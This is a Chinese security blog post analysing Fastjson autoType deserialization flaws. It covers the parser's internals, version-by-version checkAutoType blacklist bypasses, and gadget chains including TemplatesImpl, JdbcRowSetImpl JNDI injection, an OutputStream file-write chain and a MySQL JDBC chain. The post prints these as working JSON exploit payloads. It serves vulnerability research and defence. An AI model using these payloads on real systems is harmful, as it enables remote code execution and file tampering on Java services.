<!DOCTYPE html>
<html lang="zh-cn">
  <head><meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="Fastjson-autoType漏洞总结"/><meta name="keywords" content="research,analyze" /><link rel="alternate" href="/atom.xml" title="Blog" type="application/atom+xml"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.0" />
<link rel="canonical" href="https://hosch3n.github.io/2022/03/24/Fastjson-autoType漏洞总结/"/>

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.0" />

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-180953397-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-180953397-1');
</script><script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script>
  window.config = {"leancloud":{"app_id":null,"app_key":null},"toc":true,"fancybox":true,"pjax":"","latex":false};
</script>

    <title>Fastjson-autoType漏洞总结 - Blog</title>
  <meta name="generator" content="Hexo 5.4.0"></head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">Blog</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/">
        <li class="mobile-menu-item">首页
          </li>
      </a><a href="/tags/">
        <li class="mobile-menu-item">标签
          </li>
      </a><a href="/categories/">
        <li class="mobile-menu-item">分类
          </li>
      </a><a href="/about/">
        <li class="mobile-menu-item">关于
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">Blog</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/">
            首页
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/tags/">
            标签
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/categories/">
            分类
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about/">
            关于
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">Fastjson-autoType漏洞总结
        </h1>

      <div class="post-meta">
        <span class="post-time">
          2022-03-24
        </span><span class="post-category">
            <a href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
            </span>
        </div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2-24%E4%B8%80%E8%88%AC%E6%B5%81%E7%A8%8B%E7%AE%80%E8%BF%B0"><span class="toc-text">1.2.24一般流程简述</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8getter"><span class="toc-text">调用getter</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8C%87%E5%AE%9A%E8%BF%98%E5%8E%9F%E7%B1%BB"><span class="toc-text">指定还原类</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-text">TemplatesImpl利用链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JdbcRowSetImpl%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-text">JdbcRowSetImpl利用链</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#checkAutoType%E7%BB%95%E8%BF%87"><span class="toc-text">checkAutoType绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BB%95%E8%BF%87%E9%BB%91%E5%90%8D%E5%8D%95"><span class="toc-text">绕过黑名单</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E7%BC%93%E5%AD%98%E6%9C%BA%E5%88%B6"><span class="toc-text">利用缓存机制</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%9C%9F%E6%9C%9B%E7%B1%BB"><span class="toc-text">利用期望类</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AF%BB%E6%89%BEGadgets"><span class="toc-text">寻找Gadgets</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#OutputStream%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-text">OutputStream利用链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MysqlJDBC%E5%88%A9%E7%94%A8%E9%93%BE"><span class="toc-text">MysqlJDBC利用链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8C%E4%BA%B2%E5%A7%94%E6%B4%BE%E7%B1%BB%E5%8A%A0%E8%BD%BD"><span class="toc-text">双亲委派类加载</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-text">参考链接</span></a></li></ol>
    </div>
  </div><div class="post-content"><blockquote>
<p>Fastjson is a Java library that can be used to convert Java Objects into their JSON representation. It can also be used to convert a JSON string to an equivalent Java object. Fastjson can work with arbitrary Java objects including pre-existing objects that you do not have source-code of.</p>
</blockquote>
<p>可以由<code>JSON.toJSONString(object)</code>将对象序列化为json字符串，由<code>JSON.parseObject/parseArray</code>或<code>JSON.parse</code>从json字符串中反序列化还原为对象。在序列化时指定开启<code>SerializerFeature.WriteClassName</code>功能，会在生成的json字段中加入<code>@type</code>用于指定具体类名，这样可以避免继承类被误反序列化为父类，从而丢失子类特有属性。</p>
<h2 id="1-2-24一般流程简述"><a href="#1-2-24一般流程简述" class="headerlink" title="1.2.24一般流程简述"></a>1.2.24一般流程简述</h2><p>根据方法与传参的不同，入口可能对应多个重载方法，但总体上与漏洞相关的逻辑大同小异：</p>
<ol>
<li><p>解析器初始化，调用解析方法</p>
</li>
<li><p>加载<code>@type</code>指定的类对象和与之对应的<code>Deserializer</code></p>
</li>
<li><p>如果类名在<code>denyList</code>中就抛出异常（黑名单）</p>
</li>
<li><p>如果是<code>JavaBeanDeserializer</code>，会通过内省获取方法和属性</p>
</li>
<li><p>获取到<code>defaultConstructor</code>则会进入第六步</p>
</li>
<li><p>将满足条件的setter与getter及相关属性，封装为<code>FieldInfo</code>类并加入<code>fieldList</code></p>
</li>
</ol>
<p><img src="/img/fastjsonsum_a.png"></p>
<p><img src="/img/fastjsonsum_b.png"></p>
<ol start="7">
<li><p>将<code>Deserializer</code>缓存进<code>IdentityHashMap</code></p>
</li>
<li><p>获取各个属性对应的<code>FieldValueDeserilizer</code>，反序列化属性对象</p>
</li>
<li><p>由<code>setValue</code>根据属性类型，按照不同方式还原类对象属性</p>
</li>
</ol>
<p><img src="/img/fastjsonsum_c.png"></p>
<h3 id="调用getter"><a href="#调用getter" class="headerlink" title="调用getter"></a>调用getter</h3><p>第六步getter对于返回值类型要求比较严格，可以利用Fastjson一些特性扩大范围。</p>
<p>对于<code>JSON.parseObject(String text)</code>会先调用<code>parse</code>解析，如果返回类型不是<code>JSONObject</code>就通过<code>toJSON</code>转换:</p>
<p><img src="/img/fastjsonsum_i.png"></p>
<p>满足判断时可由<code>JSONSerializer.getObjectWriter</code>-&gt;<code>TypeUtils.buildBeanInfo</code>-&gt;<code>computeGetters</code>获取getter且无返回值类型限制。因为<code>JSONObject.toString</code>被重写成了<code>toJSONString</code>，只需构造形如<code>&#123;&#123;Gadgets&#125;:&quot;str&quot;&#125;</code>的结构即可触发。</p>
<p>此外对于JSON中<code>$ref</code>的值，会在<code>parse</code>完成后作为JSONPath解析，传入<code>$.valuea.valueb</code>可以链式触发<code>getValuea</code>和<code>getValueb</code>，这样就能调用到指定getter。</p>
<h3 id="指定还原类"><a href="#指定还原类" class="headerlink" title="指定还原类"></a>指定还原类</h3><p>当<code>parseObject</code>方法指定的还原类与JSON中<code>@type</code>指定的还原类不一致时，根据@香依香偎师傅的实验结果来看，如果两个类存在继承关系或是能由<code>toString</code>等方法转换，则通常可以正常反序列化并触发Payload；否则要具体情况具体分析。</p>
<h2 id="TemplatesImpl利用链"><a href="#TemplatesImpl利用链" class="headerlink" title="TemplatesImpl利用链"></a>TemplatesImpl利用链</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;_bytecodes&quot;</span>:[<span class="string">&quot;BASE64&quot;</span>],</span><br><span class="line">  <span class="attr">&quot;_name&quot;</span>:<span class="string">&quot;any&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;_tfactory&quot;</span>:&#123;&#125;,</span><br><span class="line">  <span class="attr">&quot;_outputProperties&quot;</span>:&#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>outputProperties</code>属性在<code>setValue</code>时，会调用<code>TemplatesImpl#getOutputProperties</code>，进而调用到<code>TransletClassLoader#defineClass</code>触发类加载。</p>
<p>Payload几个关键属性都是<code>private</code>且无相应setter/getter，因此反序列化时需要指定1.2.22版本引入的<code>Feature.SupportNonPublicField</code>：</p>
<p><img src="/img/fastjsonsum_d.png"></p>
<h2 id="JdbcRowSetImpl利用链"><a href="#JdbcRowSetImpl利用链" class="headerlink" title="JdbcRowSetImpl利用链"></a>JdbcRowSetImpl利用链</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;dataSourceName&quot;</span>:<span class="string">&quot;RogueJNDI&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;autoCommit&quot;</span>:<span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>autoCommit</code>属性在<code>setValue</code>时，会调用<code>JdbcRowSetImpl#setAutoCommit</code>，进而调用到<code>InitialContext#lookup</code>触发JNDI注入。</p>
<h2 id="checkAutoType绕过"><a href="#checkAutoType绕过" class="headerlink" title="checkAutoType绕过"></a>checkAutoType绕过</h2><p>从1.2.25开始先进入<code>checkAutoType</code>检查，再调用<code>TypeUtils.loadClass</code>加载类。</p>
<h3 id="绕过黑名单"><a href="#绕过黑名单" class="headerlink" title="绕过黑名单"></a>绕过黑名单</h3><p>在手动开启<code>autoTypeSupport</code>时，会将类名与内置黑名单进行前缀匹配。利用<code>TypeUtils.loadClass</code>剔除<code>L</code>前缀和<code>;</code>后缀的特点，在原类名前后添加字符即可绕过内置黑名单的判断。</p>
<ul>
<li><code>L ClassName ;</code>、<code>[</code>分别是JVM的类、数组表示符</li>
</ul>
<p>1.2.42先剔除一次类名前后的<code>L</code>和<code>;</code>再进行黑名单判断，同时将黑名单从明文改为哈希形式，可以双写字符绕过。</p>
<p>1.2.43检查两次前缀，拦截<code>LL</code>开头的情况，可以构造<code>[ClassName[&#123;...</code>的数组形式，利用内部逻辑调用到<code>parseArray</code>实现绕过。</p>
<p>1.2.44增加了对<code>[</code>开头的检查，终结了已有黑名单绕过。如果存在某些依赖可以利用新链突破，后续更新也在继续完善黑名单。</p>
<h3 id="利用缓存机制"><a href="#利用缓存机制" class="headerlink" title="利用缓存机制"></a>利用缓存机制</h3><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &#123;&quot;@type&quot;:&quot;java.lang.Class&quot;,&quot;val&quot;:&quot;GadgetsClassname&quot;&#125;:Gadgets</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>以1.2.47为例，<code>java.lang.Class</code>对应的deserializer是<code>MiscCodec</code>，反序列化会解析JSON中<code>val</code>对应的值并生成对象，之后通过<code>TypeUtils.loadClass</code>加载<code>java.lang.Class</code>。loadClass方法的<code>cache</code>参数的缺省值为true，会将<code>val</code>值生成的对象存入<code>mappings</code>中。</p>
<p>下一轮<code>checkAutoType</code>时如果手动开启了<code>autoTypeSupport</code>，恶意类先黑名单匹配还是会被检测到，但只要在<code>mappings</code>缓存中匹配到了就不会抛出异常。之后无论<code>checkAutoType</code>是否开启，都能拿到缓存中的恶意类。</p>
<p><img src="/img/fastjsonsum_e.png"></p>
<p>要注意的是虽然1.2.25就加入了缓存机制，但1.2.33之前匹配黑名单就会抛出异常。1.2.48将<code>cache</code>缺省值改为false，新增了<code>Class.forName</code>前的判断，同时追加了黑名单以及对<code>expectClass</code>的检测。</p>
<h3 id="利用期望类"><a href="#利用期望类" class="headerlink" title="利用期望类"></a>利用期望类</h3><p>期望类可以由类间关系隐式确定，也可以由两个<code>@type</code>显式指定。一个期望类为<code>Foo</code>的例子：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span> </span>&#123;</span><br><span class="line">    Foo id;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">FooImpl</span> <span class="keyword">implements</span> <span class="title">Foo</span> </span>&#123;</span><br><span class="line">    String fooId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>由类间关系确定</li>
</ul>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;User&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;id&quot;</span>:&#123;</span><br><span class="line">        <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;FooImpl&quot;</span>,</span><br><span class="line">        <span class="attr">&quot;fooId&quot;</span>:<span class="string">&quot;abc&quot;</span></span><br><span class="line">    &#125;,   </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>由JSON显式指定</li>
</ul>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;Foo&quot;</span>,<span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;FooImpl&quot;</span>,<span class="attr">&quot;fooId&quot;</span>:<span class="string">&quot;abc&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<p>从玄武实验室梳理的<code>checkAutoType</code>的流程可以看出，期望类及其派生的子类不在黑名单中就能通过检查：</p>
<p><img src="/img/fastjsonsum_f.png"></p>
<p><code>expectClass</code>由<code>checkAutoType</code>的二参传入，多数情况下是null，先要找出存在有效参数的调用，一个是<code>ThrowableDeserializer</code>、一个是<code>JavaBeanDeserializer</code></p>
<p><img src="/img/fastjsonsum_g.png"></p>
<p>在<code>ParserConfig#getDeserializer</code>可以看到<code>Throwable.class</code>的派生类由<code>ThrowableDeserializer</code>处理、没有专属Deserializer的类由<code>JavaBeanDeserializer</code>处理</p>
<p><img src="/img/fastjsonsum_h.png"></p>
<p>哪些类会由<code>JavaBeanDeserializer</code>处理呢？以<code>TypeUtils#addBaseClassMappings</code>的<code>classes</code>作为样本，提取<code>getDeserializer</code>方法稍作改动并筛除<code>expectClassFlag</code>为false的类后得到：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">java.lang.AutoCloseable</span><br><span class="line">java.lang.StackTraceElement</span><br><span class="line">java.util.concurrent.atomic.AtomicInteger</span><br><span class="line">java.util.concurrent.atomic.AtomicLong</span><br><span class="line">java.lang.Boolean</span><br><span class="line">java.lang.Character</span><br><span class="line">java.lang.Byte</span><br><span class="line">java.lang.Short</span><br><span class="line">java.lang.Integer</span><br><span class="line">java.lang.Long</span><br><span class="line">java.lang.Float</span><br><span class="line">java.lang.Double</span><br><span class="line">java.lang.Number</span><br><span class="line">java.lang.String</span><br><span class="line">java.math.BigDecimal</span><br><span class="line">java.math.BigInteger</span><br><span class="line">java.util.BitSet</span><br><span class="line">java.util.Calendar</span><br><span class="line">java.util.Date</span><br><span class="line">java.util.Locale</span><br><span class="line">java.util.UUID</span><br><span class="line">java.sql.Time</span><br><span class="line">java.sql.Date</span><br><span class="line">java.sql.Timestamp</span><br><span class="line">java.text.SimpleDateFormat</span><br><span class="line">com.alibaba.fastjson.JSONPObject</span><br></pre></td></tr></table></figure>

<ul>
<li>1.2.68更新的<code>safeMode</code>机制用于完全禁用<code>autoType</code>，手动开启后遇到<code>@type</code>直接抛异常</li>
</ul>
<h2 id="寻找Gadgets"><a href="#寻找Gadgets" class="headerlink" title="寻找Gadgets"></a>寻找Gadgets</h2><p>派生类中有可被自动调用的敏感方法，就是一个可选的潜在期望类，最好是一个被广泛使用的接口（<code>AutoCloseable</code>表示你直接报我哈希得了(✪ω✪)）。而魔术方法除了setter、getter、无参构造函数外，还可以调用 能通过<code>ASMUtils.lookupParameterNames</code>获取到参数名 且重载参数最多的构造函数：</p>
<p><img src="/img/fastjsonsum_k.png"></p>
<ul>
<li>参数名存放于<code>LocalVariableTable</code>，只在编译时带调试信息才会有</li>
</ul>
<h3 id="OutputStream利用链"><a href="#OutputStream利用链" class="headerlink" title="OutputStream利用链"></a>OutputStream利用链</h3><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;java.lang.AutoCloseable&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;sun.rmi.server.MarshalOutputStream&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;out&quot;</span>:&#123;</span><br><span class="line">        <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;java.util.zip.InflaterOutputStream&quot;</span>,</span><br><span class="line">        <span class="attr">&quot;out&quot;</span>:&#123;</span><br><span class="line">            <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;java.io.FileOutputStream&quot;</span>,</span><br><span class="line">            <span class="attr">&quot;file&quot;</span>:<span class="string">&quot;/tmp/test&quot;</span>,</span><br><span class="line">            <span class="attr">&quot;append&quot;</span>:<span class="literal">true</span></span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="attr">&quot;infl&quot;</span>:&#123;</span><br><span class="line">            <span class="attr">&quot;input&quot;</span>:&#123;</span><br><span class="line">                <span class="attr">&quot;array&quot;</span>:<span class="string">&quot;eNorSS0uMTQyBgAKygJX&quot;</span>,</span><br><span class="line">                <span class="attr">&quot;limit&quot;</span>:<span class="number">15</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="attr">&quot;bufLen&quot;</span>:<span class="string">&quot;100&quot;</span></span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">&quot;protocolVersion&quot;</span>:<span class="number">1</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li><p>通过<code>FileOutputStream(File file, boolean append)</code>创建文件并作为<code>InflaterOutputStream(OutputStream out, Inflater infl, int bufLen)</code>的一参</p>
</li>
<li><p>二参<code>Inflater</code>类中存在<code>ByteBuffer input</code>属性，经过<code>JSONScanner#bytesValue</code>Base64解码得到byte后，会在<code>ByteBufferCodec$ByteBufferBean#byteBuffer</code>完成组装（其中<code>array</code>是zip压缩后byte的Base64编码，<code>limit</code>是字节长度）</p>
</li>
<li><p>最终由<code>MarshalOutputStream</code>的父类构造函数<code>ObjectOutputStream</code>-&gt;<code>this.bout.setBlockDataMode</code>-&gt;<code>this.drain</code>-&gt;<code>this.out.write</code>触发写入</p>
</li>
</ol>
<p>要注意的是1.2.57才开始支持ByteBuffer反序列化，有调试信息的部分JDK8版本与这个OpenJDK11<code>input</code>属性有不同。</p>
<h3 id="MysqlJDBC利用链"><a href="#MysqlJDBC利用链" class="headerlink" title="MysqlJDBC利用链"></a>MysqlJDBC利用链</h3><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  <span class="attr">&quot;@type&quot;</span>: <span class="string">&quot;java.lang.AutoCloseable&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;@type&quot;</span>: <span class="string">&quot;com.mysql.jdbc.JDBC4Connection&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;hostToConnectTo&quot;</span>: <span class="string">&quot;127.0.0.1&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;portToConnectTo&quot;</span>: <span class="number">3306</span>,</span><br><span class="line">  <span class="attr">&quot;info&quot;</span>: &#123;</span><br><span class="line">    <span class="attr">&quot;user&quot;</span>: <span class="string">&quot;root&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;password&quot;</span>: <span class="string">&quot;pass&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;statementInterceptors&quot;</span>: <span class="string">&quot;com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;autoDeserialize&quot;</span>: <span class="string">&quot;true&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;NUM_HOSTS&quot;</span>: <span class="string">&quot;1&quot;</span></span><br><span class="line">  &#125;,</span><br><span class="line">  <span class="attr">&quot;databaseToConnectTo&quot;</span>: <span class="string">&quot;dbname&quot;</span>,</span><br><span class="line">  <span class="attr">&quot;url&quot;</span>: <span class="string">&quot;&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>JDBC4Connection类构造函数初始化时会使用父类ConnectionImpl的构造函数，进一步通过<code>ServerStatusDiffInterceptor#populateMapWithSessionStatusValues</code>-&gt;<code>Util.resultSetToMap</code>-&gt;<code>rs.getObject</code>触发MysqlJDBC反序列化。</p>
<h3 id="双亲委派类加载"><a href="#双亲委派类加载" class="headerlink" title="双亲委派类加载"></a>双亲委派类加载</h3><p>通过<code>System.getProperty</code>可以获取<code>sun.boot.class.path</code>、<code>java.ext.dirs</code>的值，根据双亲委派的特点如果能将恶意类上传/写入<code>jre/classes</code>（这个目录似乎默认不存在，需要新建），或者覆盖已有的jar包（比如<code>charsets.jar</code>），就可以由Fastjson触发恶意类加载。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 实现AutoCloseable</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;java.lang.AutoCloseable&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;Run&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 继承Exception</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;java.lang.Exception&quot;</span>,</span><br><span class="line">    <span class="attr">&quot;@type&quot;</span>:<span class="string">&quot;Run&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/wiki/enable_autotype">enable_autotype</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/wiki/JSONPath">JSONPath</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/wiki/fastjson_safemode">fastjson_safemode</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/0a5krhX-V_yCkz-zDN5kGg">fastjson 反序列化漏洞 POC 分析</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/208339.html">浅谈Fastjson RCE漏洞的绕过史</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/threedr3am/learnjavabug/commit/ea61297cf7b2125ecae0064d2b8061a9e32db1e6">fastjson一种利用$ref几乎任意getter触发的方法</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/LeadroyaL/fastjson-blacklist">fastjson blacklist</a></p>
<p><a target="_blank" rel="noopener" href="https://rmb122.com/2020/06/12/fastjson-1-2-68-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-gadgets-%E6%8C%96%E6%8E%98%E7%AC%94%E8%AE%B0/">fastjson 1.2.68 反序列化漏洞 gadgets 挖掘笔记</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/issues/2357">fastjson序列化ByteBuffer的问题</a></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg">Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析</a></p>
<p><a target="_blank" rel="noopener" href="https://i.blackhat.com/USA21/Wednesday-Handouts/US-21-Xing-How-I-Used-a-JSON.pdf">US-21-Xing-How-I-Used-a-JSON</a></p>
<p><a target="_blank" rel="noopener" href="https://i.blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf">eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack</a></p>
<p><a target="_blank" rel="noopener" href="https://landgrey.me/blog/22/">Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索</a></p>
<p><a target="_blank" rel="noopener" href="https://articles.zsxq.com/id_56fvo4dtbivd.html">JDK8任意文件写场景下的Fastjson RCE</a></p>

      </div>
      
      <footer class="post-footer">
        <div class="post-tags">
            <a href="/tags/Fastjson/">Fastjson</a>
            <a href="/tags/unserialize/">unserialize</a>
            <a href="/tags/Xalan/">Xalan</a>
            <a href="/tags/JNDI/">JNDI</a>
            <a href="/tags/JDBC/">JDBC</a>
            </div>
        
        <nav class="post-nav"><a class="prev" href="/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">SpringCloudFunction漏洞分析</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    <a class="next" href="/2022/02/15/%E6%94%BB%E5%87%BBJavaRMI%E6%A6%82%E8%BF%B0/">
        <span class="next-text nav-default">攻击JavaRMI概述</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    </nav></footer>
    </article></div><div class="comments" id="comments"></div></div>
      </main>

